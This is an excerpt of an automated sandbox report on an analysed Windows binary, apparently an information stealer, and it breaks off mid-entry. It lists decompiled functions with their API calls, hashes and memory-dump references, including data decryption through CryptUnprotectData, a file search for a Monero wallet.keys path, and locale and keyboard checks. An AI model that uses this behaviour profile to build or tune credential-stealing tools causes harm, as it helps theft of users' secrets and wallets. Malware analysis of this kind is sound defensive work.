                                  • Instruction Fuzzy Hash: 3B915572900105ABDB14FB70EC5ADED7B7DFBC4344F408558F80A96185EE34AB59CBA2
                                  Function 00547B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,005505AF), ref: 00547BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00547BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00547C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00547C62
                                  • LocalFree.KERNEL32(00000000), ref: 00547D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 21628a9c054891eaa4fdeaf333ae9b8808bca7280087f48f0143b5f02bdc42f6
                                  • Instruction ID: 83d8b39fe353288c375fa64f5cac890900c334f9e3780b2d606602f8cc94c8a2
                                  • Opcode Fuzzy Hash: 21628a9c054891eaa4fdeaf333ae9b8808bca7280087f48f0143b5f02bdc42f6
                                  • Instruction Fuzzy Hash: AE414C7194021DABDB64DB94DC9DBEEBB74FF88708F204199E50962181DB342F85CFA1
                                  Function 008FD63E Relevance: 10.4, Strings: 7, Instructions: 1638COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !%{$6qvA$]{S$o5_$qmg7$*Q$Iy<
                                  • API String ID: 0-2781839334
                                  • Opcode ID: 66a7fe63f2c199d89f150b1c92da9130be9dd442676108ba3907cba196c2fa8c
                                  • Instruction ID: f5001895ac31e6b728f0f631c815b32732d9a52348a05fd5735c74ec8a47566f
                                  • Opcode Fuzzy Hash: 66a7fe63f2c199d89f150b1c92da9130be9dd442676108ba3907cba196c2fa8c
                                  • Instruction Fuzzy Hash: 73B206F3A082149FE304AE2DDC8567AB7E9EFD4720F1A893DEAC4C3744E67558018697
                                  Function 0053E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00550D73), ref: 0053E4A2
                                  • StrCmpCA.SHLWAPI(?,005514F8), ref: 0053E4F2
                                  • StrCmpCA.SHLWAPI(?,005514FC), ref: 0053E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 68520116eb90b851c4a389733cf8ee2efaffafdd158d0f1e516e3855914c4a2f
                                  • Instruction ID: 0307dbdbc89cbea12661d1143f3e647a4477769d73851d76bb1e5fe43653b9be
                                  • Opcode Fuzzy Hash: 68520116eb90b851c4a389733cf8ee2efaffafdd158d0f1e516e3855914c4a2f
                                  • Instruction Fuzzy Hash: BC126332940119AAEB54FB70DC9AEED7B78BFD4308F404599B50A92091EF306F49CF92
                                  Function 00539AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00534EEE,00000000,?), ref: 00539B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00534EEE,00000000,?), ref: 00539B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: NS
                                  • API String ID: 4291131564-2024404569
                                  • Opcode ID: e76d99e3d4b85cc031746bfd835286f78bfd77a6744634bf6eb6aefb1e806ea0
                                  • Instruction ID: b74ce7096bbc879bf6aa34d65b83d749ee62b8864e493ff1dea902243f8b4ef0
                                  • Opcode Fuzzy Hash: e76d99e3d4b85cc031746bfd835286f78bfd77a6744634bf6eb6aefb1e806ea0
                                  • Instruction Fuzzy Hash: 1411A4B4640208FFEB10CF64DC95FAAB7B5FB89700F208058F9199B390C7B5A951CB55
                                  Function 0053C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0053C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0053C87C
                                  • lstrcat.KERNEL32(?,00550B46), ref: 0053C943
                                  • lstrcat.KERNEL32(?,00550B47), ref: 0053C957
                                  • lstrcat.KERNEL32(?,00550B4E), ref: 0053C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 973c6d032cf866f50e380f20d106d2f93830fb9a3a949365971ee05b2c76647b
                                  • Instruction ID: 3393c03dfa6b0f61247babdd7c5cb45edfb3f64a5979e353a7ccda707da2b7e6
                                  • Opcode Fuzzy Hash: 973c6d032cf866f50e380f20d106d2f93830fb9a3a949365971ee05b2c76647b
                                  • Instruction Fuzzy Hash: 2E41847590421AEFDB10DF90DD89BFEBBB8BB84744F1045A8E509A6280D7745A84CF92
                                  Function 00546920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 0054696C
                                  • sscanf.NTDLL ref: 00546999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005469B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005469C0
                                  • ExitProcess.KERNEL32 ref: 005469DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: cf5fc111f33f75bfefe8ec19b003792e7959d5b032232d7c1c6749e5239d13b9
                                  • Instruction ID: d9aac39075e1b63104bf86f8f5c2b34c06bfd80a01912d84288082a490804d66
                                  • Opcode Fuzzy Hash: cf5fc111f33f75bfefe8ec19b003792e7959d5b032232d7c1c6749e5239d13b9
                                  • Instruction Fuzzy Hash: 2B210175D04209ABDF04EFE4D945AEEB7B5FF88304F04852EE40AE3250EB345605CB6A
                                  Function 00537240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0053724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00537254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00537281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005372A4
                                  • LocalFree.KERNEL32(?), ref: 005372AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 02e0dc0f72eb6c958817c7a8ce8a247a54c0f9f3a5a9cdfb827f0ff6b866dd4e
                                  • Instruction ID: dc99562f6df7f6124d1bdb087cbf0941ea153452e07a07b0d83d34aee03a7385
                                  • Opcode Fuzzy Hash: 02e0dc0f72eb6c958817c7a8ce8a247a54c0f9f3a5a9cdfb827f0ff6b866dd4e
                                  • Instruction Fuzzy Hash: 0D0100B5A40208BBEB14DBD4CD46F9E77B8BB44701F108555FB09AA2C0D674AA408B6A
                                  Function 00549600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0054961E
                                  • Process32First.KERNEL32(00550ACA,00000128), ref: 00549632
                                  • Process32Next.KERNEL32(00550ACA,00000128), ref: 00549647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0054965C
                                  • CloseHandle.KERNEL32(00550ACA), ref: 0054967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: 57692f40629fd3ee3bf8016f4e607daa11d6f2f91c87cf0f4c7afd98379bbd06
                                  • Instruction ID: 8a2dcb17ad10686a51896337a94aaa30d1e41a4ef1405863006d331114f47cdb
                                  • Opcode Fuzzy Hash: 57692f40629fd3ee3bf8016f4e607daa11d6f2f91c87cf0f4c7afd98379bbd06
                                  • Instruction Fuzzy Hash: AA011E75A00208FBDB15DFA5CD49BEEBBF8FB48345F108198A90997240D7349B80CF51
                                  Function 00548EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00535184,40000001,00000000,00000000,?,00535184), ref: 00548EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 74cdf7482d05633660fef6dc2e2b7f3d3b242de86e8e81839323371d5ab56134
                                  • Instruction ID: b75d56e7029c5426dd7549136afe867d5b9d8f126c6ada5b8a451f1bae629af7
                                  • Opcode Fuzzy Hash: 74cdf7482d05633660fef6dc2e2b7f3d3b242de86e8e81839323371d5ab56134
                                  • Instruction Fuzzy Hash: E3110674200209BFDB04CF64D884FBA3BA9BF89748F109848F9198B250DB75E895DB65
                                  Function 00547A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011FE188,00000000,?,00550E10,00000000,?,00000000,00000000), ref: 00547A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00547A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011FE188,00000000,?,00550E10,00000000,?,00000000,00000000,?), ref: 00547A7D
                                  • wsprintfA.USER32 ref: 00547AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: 7cb4ae459f4a9c7dd501e77b0ad64c6eadc94f37c836b780d9878d8d3d16ab1a
                                  • Instruction ID: d06f651c33f664ba61c3b926b8e0ef9a3de2988e0dba264941ec60766ccc92b2
                                  • Opcode Fuzzy Hash: 7cb4ae459f4a9c7dd501e77b0ad64c6eadc94f37c836b780d9878d8d3d16ab1a
                                  • Instruction Fuzzy Hash: 73118EB1A45218EBEB208B54DC49FA9BB78FB44721F10479AE90A932C0C7781A80CF52
                                  Function 00904214 Relevance: 5.4, Strings: 3, Instructions: 1615COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
